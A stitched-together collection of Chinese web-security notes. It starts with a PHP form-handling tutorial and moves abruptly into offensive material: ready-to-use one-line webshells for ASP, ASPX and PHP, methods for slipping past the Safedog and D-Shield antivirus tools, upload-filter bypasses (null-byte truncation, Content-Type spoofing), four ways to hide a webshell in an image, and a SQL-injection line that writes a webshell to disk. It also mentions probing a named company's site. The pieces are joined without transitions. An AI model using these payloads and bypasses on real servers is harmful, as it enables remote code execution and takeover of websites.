例如发送到服务器的url为/welcome.php?fname=Shuke&age=3welcome.php⽂件现在就可以$_GET变量来收集表单数据了欢迎<?php echo $_GET["fname"]; ?>!<br>//在html中<br>表⽰换⾏，有多少个<br>就表⽰换多少⾏。

你的年龄是<?php echo $_GET["age"]; ?> 岁得到的结果显⽰为欢迎shuke！你的年龄是3岁PHP $_POST在PHP中，预定的$_POST⽤于收集来⾃method="post"表单中的值跟GET相反，POST⽅法发送的表单对任何⼈都是不可见的，当然也不会显⽰在浏览器地址栏的url中，⽽$_POST就是⽤来收集⽤POST⽅法发送的表单数据的变量，⽽表单域的名称会⾃动变成为$ _POST数组中的键。

例如form.html⽂件代码如下<html><head><meta charset="utf-8"><title>xxxxx</title></head><body><form action="welcome.php" method="post">名字: <input type="text" name="fname">年龄: <input type="text" name="age"><input type="submit" value="提交"></form></body></html>提交时，url显⽰为/welcome.phpwelcome.php⽂件现在就可以$_POST变量来收集表单数据了欢迎<?php echo $_POST["fname"]; ?>!<br>你的年龄是<?php echo $_POST["age"]; ?> 岁得到的结果显⽰为欢迎shuke！你的年龄是3岁$_REQUEST变量包含$_GET _POST _COOIKE的内容，可收集通过POST或GET发送的的表单数据eval（）函数要点：eval（）函数把字符串作为PHP代码执⾏。

如何⾃⼰写aspx过狗D盾⼀句话⽊马hi，我是凉风，（以下内容纯属个⼈见解，如有不同的意见欢迎回复指出），本菜⽐发现aspx过狗的姿势不常见，不像php⼀样⼀抓⼀⼤把，于是我决定研究⼀下aspx引⽤i春秋作家团⼤佬对⼀句话⽊马的理解：⼀句话⽊马的意思就是，我们制造了⼀个包含远程代码执⾏漏洞的web页⾯。

⽬录：0×01:我没有aspx代码编写基础，我该从哪⼊⼿？0×02:正式开始：从过狗菜⼑配置⽂件⾥寻找思路0×03:再写⼀个：分析各种拦截机制，⼀⼀绕过0×04:总结0×01:我没有aspx代码编写基础，我该从哪⼊⼿？在这⾥，本菜⽐与⼩⽩们⼀起学习：如何⾃⼰写aspx过狗⼀句话⽊马“授⼈以鱼不如授⼈以渔”前期准备（建议，⾃⾏决定）：（1）了解aspx，aspx的百度百科⾄少看⼀遍，看懂aspx⼀句话⽊马（2）准备好可以查资料的⽹站（aspx语法、函数等必备知识）、⼯具，例如官⽅⼿册（chm⽂件）。

（3）本地搭建环境，装好安全狗，D盾顺便也装了（4）菜⼑肯定不可少aspx⽂件就是⽂件，需要.net 环境，⽤“C#”,“Jscript”等语⾔编写。

Jscript⼿册我会放在附件⾥我⽤的是环境，装了 .net 2.0与4.00×02:正式开始：从过狗菜⼑配置⽂件⾥寻找思路我并不会aspx，起步的时候很难凭空弄个过狗的出来，那么就要⾃⼰想办法。

因为曾经分析过：过狗菜⼑php的配置，配置⾥过狗的思路与php过狗⽊马类似，所以我在没学过aspx并且没有过狗的aspx⼀句话作为参考的时候，突然想到酱紫做。

曾经的分析：我们看⼀下配置⽂件关于aspx的部分：先根据它的格式还原回正常的代码（把%%换回%）可以看有⼀部分是经过url编码的，因为⽂件貌似不能直接解析，所以先还原，看还原之后的代码。

利⽤⽹上的在线解码直接转码：因为我曾分析过，知道：其中%s是菜⼑要执⾏的经过base64加密的命令。

一句话木马绕过和防御作者：jaivy若有错误欢迎指正，非常感谢！若有疑问欢迎讨论，共同学习！·WebShellWebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。

中国菜刀可以连接asp、aspx、php、jsp的一句话木马。

·常见的一句话木马Asp：<%eval request("x")%>aspx: <%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%> php: <?php @eval($_POST['x']);?>密码均为x一、本地检测及绕过方法·前台文件扩展名检测（弹小框框的一般就是该检测了）（本地漏洞客户端漏洞改扩展名，burp抓包，改回来即可）四种办法绕过，1 . 00截断（两种方式实现，但实质都一样）00截断原理：计算机遇到'\0'字符，就认为字符串结束了。

（可以联系c语言字符串后面自动添加了一个‘\0’来判断是否到达末尾来理解）方法一：在hex中修改（在16进制中修改）找到文件名pass.php.jpg对应的地方把2e改为00（【2e】是字符【.】对应的hex值）方法二直接在.php后面加上%00然后选中%00，对其进行url-decode 处理方法三：直接用在.php后面加上【’\0’】（但此方法是有时无效）方法四：直接把【pass.php.jpg改为pass.php】·content-type参数检测（修改数据包content-type）ContentType 一般参数有application/x-cdf 应用型文件text/HTML 文本image/JPEG jpg 图片image/GIF gif图片把ContentType 由application/x-cdf改为image/gif·文件内容检测：文件内容检测脚本中getimagesize(string filename)函数会通过读取文件头，返回图片的长、宽等信息，如果没有相关的图片文件头，函数会报错，是一种比较严的防御措施。

做⼀个图⽚马的四种⽅法（详细步骤）
简介
图⽚马:就是在图⽚中隐藏⼀句话⽊马。

利⽤.htaccess等解析图⽚为PHP或者asp⽂件。

达到执⾏图⽚内代码⽬的
制作⽅法:
1. ⽂本⽅式打开,末尾粘贴⼀句话⽊马
2. cmd中 copy 1.jpg/b+2.php
3.jpg
/b是⼆进制形式打开
/a是ascii⽅式打开
看到有⼈说⼀定要把图⽚放前⾯,⽊马放后⾯才能成功,我亲⾃试了这两种制作⽅式(另⼀种图⽚放后⾯),均能成功连接,但是后者的⼀句话⽊马在⽂件开头,不推荐
3. 16进制打开图⽚在末尾添加⼀句话⽊马。

4. ps
注意以下⼏点:
单纯的图⽚马并不能直接和蚁剑连接，
因为该⽂件依然是以image格式进⾏解析，
只有利⽤⽂件包含漏洞，才能成功利⽤该⽊马
所谓⽂件包含漏洞，是指在代码中引⼊其他⽂件作为php⽂件执⾏时，未对⽂件进⾏严格过滤，导致⽤户指定任意⽂件，都作为php⽂件解析执⾏。

1.⽂本⽅式打开图⽚直接粘贴⼀句话⽊马
将⼀个图⽚以⽂本格式打开(这⾥⽤的notepad++.以记事本⽅式打开修改也能连接成功,不过修改后图⽚⽆法正常显⽰了),
后⾯粘贴上⼀句话⽊马
上传图⽚
连接蚁剑,嗯,很好,连接成功
2.cmd命令⾏执⾏
在windows的cmd中执⾏
可以看到末尾已经有⼀句话⽊马了
上传之后连接试试,成功
3.⽤16进制编辑器打开,末尾添加⽤winhex打开图⽚,添加⼀句话⽊马
上传,连接成功
4.⽤PhotoShop制作先打开图⽚
点击⽂件->⽂件简介
添加⽊马
上传,连接成功。

1、用^转义字符来写ASP(一句话木马)文件的方法:VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--? echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp2、显示SQL系统版本：Microsoft VBScript 编译器错误错误 '800a03f6'缺少 'End'/iisHelp/common/500-100.asp，行242Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corpo ration Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int. /display.asp，行173、在检测索尼中国的网站漏洞时，分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。

偶然间我想到了在SQL语言中可以使用―in‖关键字进行查询，例如―select * from mytable where id in(1)‖，括号中的值就是我们提交的数据，它的结果与使用―select * from mytable where id=1‖的查询结果完全相同。